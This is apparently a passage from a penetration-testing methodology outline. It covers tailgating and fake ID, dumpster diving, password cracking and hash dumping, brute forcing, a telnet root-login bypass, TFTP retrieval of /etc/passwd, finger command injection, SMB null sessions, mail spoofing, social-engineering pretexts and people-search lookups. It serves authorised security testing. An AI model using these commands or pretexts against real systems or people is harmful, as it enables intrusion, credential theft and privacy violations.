8.3.1. Guarded Doors

8.3.1.1. Piggybacking

8.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.

8.3.1.2. Fake ID

8.3.1.2.1. Attempt to use fake ID to gain access.

8.3.1.3. Access Methods

8.3.1.3.1. Test 'out of hours' entry methods

8.3.2. Unguarded Doors

8.3.2.1. Identify all unguardedentry points.

8.3.2.1.1. Are doors secured?

8.3.2.1.2. Check locks for resistance to lock picking.

8.3.3. Windows

8.3.3.1. Check windows/doors for visible intruderalarm sensors.

8.3.3.1.1. Attempt to bypass sensors.

8.3.3.2. Check visible areas for sensitive information.

8.4. Office Waste

8.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc

9. Password cracking

9.1. Rainbow crack

9.1.1. ophcrack

9.1.2. rainbow tables

9.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

9.2. Ophcrack

9.3. Cain & Abel

9.4. John the Ripper

9.4.1. ./unshadow passwd shadow > file_to_crack

9.4.2. ./john -single file_to_crack

9.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

9.4.4. ./john -show file_to_crack

9.4.5. ./john --incremental:All file_to_crack

9.5. fgdump

9.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

9.6. pwdump6

9.6.1. pwdump [-h][-o][-u][-p] machineName

9.7. medusa

9.8. LCP

9.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

9.9.1. Domain credentials

9.9.2. Sniffing

9.9.3. pwdump import

9.9.4. sam import

9.10. aiocracker

9.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list

10. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

10.1. Manual

10.1.1. Patch Levels

10.1.2. Confirmed Vulnerabilities

10.1.2.1. Severe

10.1.2.2. High

10.1.2.3. Medium

10.1.2.4. Low

10.2. Automated

10.2.1. Reports

10.2.2. Vulnerabilities

10.2.2.1. Severe

10.2.2.2. High

10.2.2.3. Medium

10.2.2.4. Low

10.3. Tools

10.3.1. GFI

10.3.2. Nessus (Linux)

10.3.2.1. Nessus (Windows)

10.3.3. NGS Typhon

10.3.4. NGS Squirrel for Oracle

10.3.5. NGS Squirrel for SQL

10.3.6. SARA

10.3.7. MatriXay

10.3.8. BiDiBlah

10.3.9. SSA

10.3.10. Oval Interpreter

10.3.11. Xscan

10.3.12. Security Manager +

10.3.13. Inguma

10.4. Resources

10.4.1. Security Focus

10.4.2. Microsoft Security Bulletin

10.4.3. Common Vulnerabilities and Exploits (CVE)

10.4.4. National Vulnerability Database (NVD)

10.4.5. The Open Source Vulnerability Database (OSVDB)

10.4.5.1. Standalone Database

10.4.5.1.1. Update URL

10.4.6. United States Computer Emergency Response Team (US-CERT)

10.4.7. Computer Emergency Response Team

10.4.8. Mozilla Security Information

10.4.9. SANS

10.4.10. Securiteam

10.4.11. PacketStorm Security

10.4.12. Security Tracker

10.4.13. Secunia

10.4.14. Vulnerabilities.org

10.4.15. ntbugtraq

10.4.16. Wireless Vulnerabilities and Exploits (WVE)

10.5. Blogs

10.5.1. Carnal0wnage

10.5.2. Fsecure Blog

10.5.3. g0ne blog

10.5.4. GNUCitizen

10.5.5. ha.ckers Blog

10.5.6. Jeremiah Grossman Blog

10.5.7. Metasploit

10.5.8. nCircle Blogs

10.5.9. pentest mokney.net

10.5.10. Rational Security

10.5.11. Rise Security

10.5.12. Security Fix Blog

10.5.13. Software Vulnerability Exploitation Blog

10.5.14. Taosecurity Blog

11. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

11.1. Password Attacks

11.1.1. Known Accounts

11.1.1.1. Identified Passwords

11.1.1.2. Unidentified Hashes

11.1.2. Default Accounts

11.1.2.1. Identified Passwords

11.1.2.2. Unidentified Hashes

11.2. Exploits

11.2.1. Successful Exploits

11.2.1.1. Accounts

11.2.1.1.1. Passwords

11.2.1.1.2. Groups

11.2.1.1.3. Other Details

11.2.1.2. Services

11.2.1.3. Backdoor

11.2.1.4. Connectivity

11.2.2. Unsuccessful Exploits

11.2.3. Resources

11.2.3.1. Securiteam

11.2.3.1.1. Exploits are sorted by year and must be downloaded individually

11.2.3.2. SecurityForest

11.2.3.2.1. Updated via CVS after initial install

11.2.3.3. GovernmentSecurity

11.2.3.3.1. Need to create and account to obtain access

11.2.3.4. Red Base Security

11.2.3.4.1. Oracle Exploit site only

11.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

11.2.3.5.1. Wireless Exploit Site

11.2.3.6. PacketStorm Security

11.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

11.2.3.7. SecWatch

11.2.3.7.1. Exploits sorted by year and month, download seperately

11.2.3.8. SecurityFocus

11.2.3.8.1. Exploits must be downloaded individually

11.2.3.9. Metasploit

11.2.3.9.1. Install and regualrly update via svn

11.2.3.10. Milw0rm

11.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!

11.3. Tools

11.3.1. Metasploit

11.3.1.1. Free Extra Modules

11.3.1.1.1. local copy

11.3.2. Manual SQL Injection

11.3.2.1. Understanding SQL Injection

11.3.2.2. SQL Injection walkthrough

11.3.2.3. SQL Injection by example

11.3.2.4. Blind SQL Injection

11.3.2.5. Advanced SQL Injection in SQL Server

11.3.2.6. More Advanced SQL Injection

11.3.2.7. Advanced SQL Injection in Oracle databases

11.3.2.8. SQL Cheatsheets

11.3.2.8.1. Untitled

11.3.3. SQL Power Injector

11.3.4. SecurityForest

11.3.5. SPI Dynamics WebInspect

11.3.6. Core Impact

11.3.7. Cisco Global Exploiter

11.3.8. PIXDos

11.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]

11.3.9. CANVAS

11.3.10. Inguma

12. Network Backbone

12.1. Generic Toolset

12.1.1. Wireshark (Formerly Ethereal)

12.1.1.1. Passive Sniffing

12.1.1.1.1. Usernames/Passwords

12.1.1.1.2. Email

12.1.1.1.3. FTP

12.1.1.1.4. HTTP

12.1.1.1.5. HTTPS

12.1.1.1.6. RDP

12.1.1.1.7. VOIP

12.1.1.1.8. Other

12.1.1.2. Filters

12.1.1.2.1. ip.src == ip_address

12.1.1.2.2. ip.dst == ip_address

12.1.1.2.3. tcp.dstport == port_no.

12.1.1.2.4. ! ip.addr == ip_address

12.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

12.1.2. Cain & Abel

12.1.2.1. Active Sniffing

12.1.2.1.1. ARP Cache Poisoning

12.1.2.1.2. DNS Poisoning

12.1.2.1.3. Routing Protocols

12.1.3. Cisco-Torch

12.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

12.1.4. NTP-Fingerprint

12.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

12.1.5. Yersinia

12.1.6. p0f

12.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

12.1.7. Manual Check (Credentials required)

12.1.8. MAC Spoofing

12.1.8.1. mac address changer for windows

12.1.8.2. macchanger

12.1.8.2.1. Random Mac Address:- macchanger -r eth0

12.1.8.3. madmacs

12.1.8.4. smac

12.1.8.5. TMAC

13. Contributors

13.1. Matt Byrne (WirelessDefence.org)

13.1.1. Matt contributed the majority of the Wireless section.

13.2. Arvind Doraiswamy (Paladion.net)

13.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

13.3. Lee Lawson (Dns.co.uk)

13.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

13.4. Nabil OUCHN (Security-database.com)

13.4.1. Nabil contributed the AS/400 section.

14. Pre-Inspection Visit - template

15. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

15.1. Untitled

15.1.1. Authoratitive Bodies

15.1.1.1. IANA - Internet Assigned Numbers Authority

15.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

15.1.1.3. NRO - Number Resource Organisation

15.1.1.4. RIR - Regional Internet Registry

15.1.1.4.1. AFRINIC - African Network Information Centre

15.1.1.4.2. APNIC - Asia Pacific Network Information Centre

15.1.1.4.3. ARIN - American Registry for Internet Numbers

15.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

15.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre

15.1.2. Websites

15.1.2.1. Central Ops

15.1.2.1.1. Domain Dossier

15.1.2.1.2. Email Dossier

15.1.2.2. DNS Stuff

15.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

15.1.2.3. Fixed Orbit

15.1.2.3.1. Autonomous System lookups and other online tools available.

15.1.2.4. Geektools

15.1.2.5. IP2Location

15.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

15.1.2.6. Kartoo

15.1.2.6.1. Metasearch engine that visually presents its results.

15.1.2.7. MyIPNeighbors.com

15.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution

15.1.2.8. My-IP-Neighbors.com

15.1.2.8.1. Excellent site that can be used if the above is down

15.1.2.9. myipneighbors.net

15.1.2.10. Netcraft

15.1.2.10.1. Online search tool allowing queries for host information.

15.1.2.11. Passive DNS Replication

15.1.2.11.1. Finds shared domains based on supplied IP addresses

15.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script

15.1.2.12. Robtex

15.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.

15.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)

15.1.2.13. Traceroute.org

15.1.2.13.1. Website listing a large number links to online traceroute resources.

15.1.2.14. Wayback Machine

15.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

15.1.2.15. Whois.net

15.1.3. Tools

15.1.3.1. Cheops-ng

15.1.3.2. Country whois

15.1.3.3. Domain Research Tool

15.1.3.4. Firefox Plugins

15.1.3.4.1. AS Number

15.1.3.4.2. Shazou

15.1.3.4.3. Firecat Suite

15.1.3.5. Gnetutil

15.1.3.6. Goolag Scanner

15.1.3.7. Greenwich

15.1.3.8. Maltego

15.1.3.9. GTWhois

15.1.3.10. Sam Spade

15.1.3.11. Smart whois

15.1.3.12. SpiderFoot

15.2. Internet Search

15.2.1. General Information

15.2.1.1. Web Investigator

15.2.1.2. Tracesmart

15.2.1.3. Friends Reunited

15.2.1.4. Ebay - profiles etc.

15.2.2. Financial

15.2.2.1. EDGAR - Company information, including real-time filings. US

15.2.2.2. Google Finance - General Finance Portal

15.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

15.2.2.4. Companies House UK

15.2.2.5. Land Registry UK

15.2.3. Phone book/ Electoral Role Information

15.2.3.1. 123people

15.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

15.2.3.2. 192.com

15.2.3.2.1. Electoral Role Search. UK

15.2.3.3. 411

15.2.3.3.1. Online White Pages and Yellow Pages. US

15.2.3.4. Untitled

15.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

15.2.3.5. BT.com. UK

15.2.3.5.1. Residential

15.2.3.5.2. Business

15.2.3.6. Pipl

15.2.3.6.1. Untitled

15.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

15.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

15.2.3.7. Spokeo

15.2.3.7.1. http://www.spokeo.com/user?q=domain_name

15.2.3.7.2. http://www.spokeo.com/user?q=email_address

15.2.3.8. Yasni

15.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

15.2.3.9. Zabasearch

15.2.3.9.1. People Search Engine. US

15.2.4. Generic Web Searching

15.2.4.1. Code Search

15.2.4.2. Forum Entries

15.2.4.3. Google Hacking Database

15.2.4.4. Google

15.2.4.4.1. Back end files

15.2.4.4.2. Email Addresses

15.2.4.4.3. Contact Details

15.2.4.5. Newsgroups/forums

15.2.4.6. Blog Search

15.2.4.6.1. Yammer

15.2.4.6.2. Google Blog Search

15.2.4.6.3. Technorati

15.2.4.6.4. Jaiku

15.2.4.6.5. Present.ly

15.2.4.6.6. Twitter Network Browser

15.2.4.7. Search Engine Comparison/ Aggregator Sites

15.2.4.7.1. Clusty

15.2.4.7.2. Grokker

15.2.4.7.3. Zuula

15.2.4.7.4. Exalead

15.2.4.7.5. Delicious

15.2.5. Metadata Search

15.2.5.1. Untitled

15.2.5.1.1. MetaData Visualisation Sites

15.2.5.1.2. Tools

15.2.5.1.3. Wikipedia Metadata Search

15.2.6. Social/ Business Networks

15.2.6.1. Untitled

15.2.6.1.1. Africa

15.2.6.1.2. Australia

15.2.6.1.3. Belgium

15.2.6.1.4. Holland

15.2.6.1.5. Hungary

15.2.6.1.6. Iran

15.2.6.1.7. Japan

15.2.6.1.8. Korea

15.2.6.1.9. Poland

15.2.6.1.10. Russia

15.2.6.1.11. Sweden

15.2.6.1.12. UK

15.2.6.1.13. US

15.2.6.1.14. Assorted

15.2.7. Resources

15.2.7.1. OSINT

15.2.7.2. International Directory of Search Engines

15.3. DNS Record Retrieval from publically available servers

15.3.1. Types of Information Records

15.3.1.1. SOA Records - Indicates the server that has authority for the domain.

15.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

15.3.1.3. NS Records - List of a host’s or domain’s name server(s).

15.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

15.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.

15.3.1.6. SRV Records - Service location record.

15.3.1.7. HINFO Records - Host information record with CPU type and operating system.

15.3.1.8. TXT Records - Generic text record.

15.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.

15.3.1.10. RP - Responsible person for the domain.

15.3.2. Database Settings

15.3.2.1. Version.bind

15.3.2.2. Serial

15.3.2.3. Refresh

15.3.2.4. Retry

15.3.2.5. Expiry

15.3.2.6. Minimum

15.3.3. Sub Domains

15.3.4. Internal IP ranges

15.3.4.1. Reverse DNS for IP Range

15.3.5. Zone Transfer

15.4. Social Engineering

15.4.1. Remote

15.4.1.1. Phone

15.4.1.1.1. Scenarios

15.4.1.1.2. Results

15.4.1.1.3. Contact Details

15.4.1.2. Email

15.4.1.2.1. Scenarios

15.4.1.2.2. Software

15.4.1.2.3. Results

15.4.1.2.4. Contact Details

15.4.1.3. Other

15.4.2. Local

15.4.2.1. Personas

15.4.2.1.1. Name

15.4.2.1.2. Phone

15.4.2.1.3. Email

15.4.2.1.4. Business Cards

15.4.2.2. Contact Details

15.4.2.2.1. Name

15.4.2.2.2. Phone number

15.4.2.2.3. Email

15.4.2.2.4. Room number

15.4.2.2.5. Department

15.4.2.2.6. Role

15.4.2.3. Scenarios

15.4.2.3.1. New IT employee

15.4.2.3.2. Fire Inspector

15.4.2.4. Results

15.4.2.5. Maps

15.4.2.5.1. Satalitte Imagery

15.4.2.5.2. Building layouts

15.4.2.6. Other

15.5. Dumpster Diving

15.5.1. Rubbish Bins

15.5.2. Contract Waste Removal

15.5.3. Ebay ex-stock sales i.e. HDD

15.6. Web Site copy

15.6.1. htttrack

15.6.2. teleport pro

15.6.3. Black Widow

16. Enumeration

16.1. Daytime port 13 open

16.1.1. nmap nse script

16.1.1.1. daytime

16.2. FTP port 21 open

16.2.1. Fingerprint server

16.2.1.1. telnet ip_address 21 (Banner grab)

16.2.1.2. Run command ftp ip_address

16.2.1.3. [email protected]

16.2.1.4. Check for anonymous access

16.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: [email protected]

16.2.2. Password guessing

16.2.2.1. Hydra brute force

16.2.2.2. medusa

16.2.2.3. Brutus

16.2.3. Examine configuration files

16.2.3.1. ftpusers

16.2.3.2. ftp.conf

16.2.3.3. proftpd.conf

16.2.4. MiTM

16.2.4.1. pasvagg.pl

16.3. SSH port 22 open

16.3.1. Fingerprint server

16.3.1.1. telnet ip_address 22 (banner grab)

16.3.1.2. scanssh

16.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

16.3.2. Password guessing

16.3.2.1. ssh root@ip_address

16.3.2.2. guess-who

16.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

16.3.2.3. Hydra brute force

16.3.2.4. brutessh

16.3.2.5. Ruby SSH Bruteforcer

16.3.3. Examine configuration files

16.3.3.1. ssh_config

16.3.3.2. sshd_config

16.3.3.3. authorized_keys

16.3.3.4. ssh_known_hosts

16.3.3.5. .shosts

16.3.4. SSH Client programs

16.3.4.1. tunnelier

16.3.4.2. winsshd

16.3.4.3. putty

16.3.4.4. winscp

16.4. Telnet port 23 open

16.4.1. Fingerprint server

16.4.1.1. telnet ip_address

16.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster

16.4.1.2. telnetfp

16.4.2. Password Attack

16.4.2.1. Untitled

16.4.2.2. Hydra brute force

16.4.2.3. Brutus

16.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

16.4.3. Examine configuration files

16.4.3.1. /etc/inetd.conf

16.4.3.2. /etc/xinetd.d/telnet

16.4.3.3. /etc/xinetd.d/stelnet

16.5. Sendmail Port 25 open

16.5.1. Fingerprint server

16.5.1.1. telnet ip_address 25 (banner grab)

16.5.2. Mail Server Testing

16.5.2.1. Enumerate users

16.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)

16.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)

16.5.2.2. Mail Spoof Test

16.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT

16.5.2.3. Mail Relay Test

16.5.2.3.1. Untitled

16.5.3. Examine Configuration Files

16.5.3.1. sendmail.cf

16.5.3.2. submit.cf

16.6. DNS port 53 open

16.6.1. Fingerprint server/ service

16.6.1.1. host

16.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.

16.6.1.2. nslookup

16.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

16.6.1.3. dig

16.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

16.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

16.6.2. DNS Enumeration

16.6.2.1. Bile Suite

16.6.2.1.1. perl BiLE.pl [website] [project_name]

16.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

16.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

16.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

16.6.2.1.5. perl exp-tld.pl [input file] [output file]

16.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

16.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]

16.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]

16.6.2.2. txdns

16.6.2.2.1. txdns -rt -t domain_name

16.6.2.2.2. txdns -x 50 -bb domain_name

16.6.2.2.3. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt

16.6.2.3. nmap nse scripts

16.6.2.3.1. dns-random-srcport

16.6.2.3.2. dns-random-txid

16.6.2.3.3. dns-recursion

16.6.2.3.4. dns-zone-transfer

16.6.3. Examine Configuration Files

16.6.3.1. host.conf

16.6.3.2. resolv.conf

16.6.3.3. named.conf

16.7. TFTP port 69 open

16.7.1. TFTP Enumeration

16.7.1.1. tftp ip_address PUT local_file

16.7.1.2. tftp ip_address GET conf.txt (or other files)

16.7.1.3. Solarwinds TFTP server

16.7.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)

16.7.2. TFTP Bruteforcing

16.7.2.1. TFTP bruteforcer

16.7.2.2. Cisco-Torch

16.8. Finger Port 79 open

16.8.1. User enumeration

16.8.1.1. finger 'a b c d e f g h' @example.com

16.8.1.2. finger [email protected]

16.8.1.3. finger [email protected]

16.8.1.4. finger [email protected]

16.8.1.5. finger [email protected]

16.8.1.6. finger **@example.com

16.8.1.7. finger [email protected]

16.8.1.8. finger @example.com

16.8.1.9. nmap nse script

16.8.1.9.1. finger

16.8.2. Command execution

16.8.2.1. finger "|/bin/[email protected]"

16.8.2.2. finger "|/bin/ls -a /@example.com"

16.8.3. Finger Bounce

16.8.3.1. finger user@host@victim

16.8.3.2. finger @internal@external

16.9. Web Ports 80,8080 etc. open

16.9.1. Fingerprint server

16.9.1.1. Telnet ip_address port

16.9.1.2. Firefox plugins

16.9.1.2.1. All

16.9.1.2.2. Specific

16.9.2. Crawl website

16.9.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source

16.9.2.2. httprint

16.9.2.3. Metagoofil

16.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

16.9.3. Web Directory enumeration

16.9.3.1. Nikto

16.9.3.1.1. nikto [-h target] [options]

16.9.3.2. DirBuster

16.9.3.3. Wikto

16.9.3.4. Goolag Scanner

16.9.4. Vulnerability Assessment

16.9.4.1. Manual Tests

16.9.4.1.1. Default Passwords

16.9.4.1.2. Install Backdoors

16.9.4.1.3. Method Testing

16.9.4.1.4. Upload Files

16.9.4.1.5. View Page Source

16.9.4.1.6. Input Validation Checks

16.9.4.1.7. Automated table and column iteration

16.9.4.2. Vulnerability Scanners

16.9.4.2.1. Acunetix

16.9.4.2.2. Grendelscan

16.9.4.2.3. NStealth

16.9.4.2.4. Obiwan III

16.9.4.2.5. w3af

16.9.4.3. Specific Applications/ Server Tools

16.9.4.3.1. Domino

16.9.4.3.2. Joomla

16.9.4.3.3. aspaudit.pl

16.9.4.3.4. Vbulletin

16.9.4.3.5. ZyXel

16.9.5. Proxy Testing

16.9.5.1. Burpsuite

16.9.5.2. Crowbar

16.9.5.3. Interceptor

16.9.5.4. Paros

16.9.5.5. Requester Raw

16.9.5.6. Suru

16.9.5.7. WebScarab

16.9.6. Examine configuration files

16.9.6.1. Generic

16.9.6.1.1. Examine httpd.conf/ windows config files

16.9.6.2. JBoss

16.9.6.2.1. JMX Console http://<IP>:8080/jmxconcole/

16.9.6.3. Joomla

16.9.6.3.1. configuration.php

16.9.6.3.2. diagnostics.php

16.9.6.3.3. joomla.inc.php

16.9.6.3.4. config.inc.php

16.9.6.4. Mambo

16.9.6.4.1. configuration.php

16.9.6.4.2. config.inc.php

16.9.6.5. Wordpress

16.9.6.5.1. setup-config.php

16.9.6.5.2. wp-config.php

16.9.6.6. ZyXel

16.9.6.6.1. /WAN.html (contains PPPoE ISP password)

16.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

16.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)

16.9.6.6.4. /Firewall_DefPolicy.html (Firewall)

16.9.6.6.5. /CF_Keyword.html (Content Filter)

16.9.6.6.6. /RemMagWWW.html (Remote MGMT)

16.9.6.6.7. /rpSysAdmin.html (System)

16.9.6.6.8. /LAN_IP.html (LAN)

16.9.6.6.9. /NAT_General.html (NAT)

16.9.6.6.10. /ViewLog.html (Logs)

16.9.6.6.11. /rpFWUpload.html (Tools)

16.9.6.6.12. /DiagGeneral.html (Diagnostic)

16.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)

16.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

16.9.6.6.15. Config Backups

16.9.7. Examine web server logs

16.9.7.1. c:\winnt\system32\Logfiles\W3SVC1

16.9.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq

16.9.8. References

16.9.8.1. White Papers

16.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

16.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

16.9.8.1.3. Blind Security Testing - An Evolutionary Approach

16.9.8.1.4. Command Injection in XML Signatures and Encryption

16.9.8.1.5. Input Validation Cheat Sheet

16.9.8.1.6. SQL Injection Cheat Sheet

16.9.8.2. Books

16.9.8.2.1. Hacking Exposed Web 2.0

16.9.8.2.2. Hacking Exposed Web Applications

16.9.8.2.3. The Web Application Hacker's Handbook

16.9.9. Exploit Frameworks

16.9.9.1. Brute-force Tools

16.9.9.1.1. Acunetix

16.9.9.2. Metasploit

16.9.9.3. w3af

16.10. Portmapper port 111 open

16.10.1. rpcdump.py

16.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)

16.10.2. rpcinfo

16.10.2.1. rpcinfo [options] IP_Address

16.11. NTP Port 123 open

16.11.1. NTP Enumeration

16.11.1.1. ntpdc -c monlist IP_ADDRESS

16.11.1.2. ntpdc -c sysinfo IP_ADDRESS

16.11.1.3. ntpq

16.11.1.3.1. host

16.11.1.3.2. hostname

16.11.1.3.3. ntpversion

16.11.1.3.4. readlist

16.11.1.3.5. version

16.11.2. Examine configuration files

16.11.2.1. ntp.conf

16.11.3. nmap nse script

16.11.3.1. ntp-info

16.12. NetBIOS Ports 135-139,445 open

16.12.1. NetBIOS enumeration

16.12.1.1. Enum

16.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

16.12.1.2. Null Session

16.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

16.12.1.3. Smbclient

16.12.1.3.1. smbclient -L //server/share password options

16.12.1.4. Superscan

16.12.1.4.1. Enumeration tab.

16.12.1.5. user2sid/sid2user

16.12.1.6. Winfo

16.12.2. NetBIOS brute force

16.12.2.1. Hydra

16.12.2.2. Brutus

16.12.2.3. Cain & Abel

16.12.2.4. getacct

16.12.2.5. NAT (NetBIOS Auditing Tool)

16.12.3. Examine Configuration Files

16.12.3.1. Smb.conf

16.12.3.2. lmhosts

16.13. SNMP port 161 open

16.13.1. Default Community Strings

16.13.1.1. public

16.13.1.2. private

16.13.1.3. cisco

16.13.1.3.1. cable-docsis

16.13.1.3.2. ILMI

16.13.2. MIB enumeration

16.13.2.1. Windows NT

16.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

16.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

16.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

16.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

16.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

16.13.2.2. Solarwinds MIB walk

16.13.2.3. Getif

16.13.2.4. snmpwalk

16.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

16.13.2.5. Snscan

16.13.2.6. Applications

16.13.2.6.1. ZyXel

16.13.2.7. nmap nse script

16.13.2.7.1. snmp-sysdescr

16.13.3. SNMP Bruteforce

16.13.3.1. onesixtyone

16.13.3.1.1. onesixytone -c SNMP.wordlist <IP>

16.13.3.2. cat

16.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist

16.13.3.3. Solarwinds SNMP Brute Force

16.13.3.4. ADMsnmp

16.13.3.5. nmap nse script

16.13.3.5.1. snmp-brute

16.13.4. Examine SNMP Configuration files

16.13.4.1. snmp.conf

16.13.4.2. snmpd.conf

16.13.4.3. snmp-config.xml

16.14. LDAP Port 389 Open

16.14.1. ldap enumeration

16.14.1.1. ldapminer

16.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

16.14.1.2. luma

16.14.1.2.1. Gui based tool
